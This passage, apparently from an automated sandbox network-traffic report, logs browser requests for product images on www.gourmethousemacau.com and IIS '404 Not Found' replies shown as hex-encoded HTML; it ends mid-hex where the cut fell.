Source: global trafficHTTP traffic detected: GET /images/productMain_icon.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/OurProducts.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /uploadfiles/SRL_2_1_3750997.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/OurProducts.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /uploadfiles/SRL_3_1_3752094.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/OurProducts.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /uploadfiles/SRL_8_1_3753286.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/OurProducts.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /uploadfiles/SRL_9_1_3754306.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/OurProducts.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /SysImages/first.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/OurProducts.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/productMain_top.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/title_products.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/productMain_icon.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /SysImages/Prev.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/OurProducts.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /uploadfiles/SRL_1_1_3750019.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /SysImages/first.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /SysImages/Next.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/OurProducts.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /uploadfiles/SRL_3_1_3752094.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /uploadfiles/SRL_2_1_3750997.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /SysImages/Last.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/OurProducts.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /uploadfiles/SRL_9_1_3754306.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /uploadfiles/SRL_8_1_3753286.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /SysImages/Prev.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /SysImages/Next.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /SysImages/Last.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Mon, 13 Mar 2023 04:26:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Mon, 13 Mar 2023 04:26:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Mon, 13 Mar 2023 04:26:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Mon, 13 Mar 2023 04:26:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 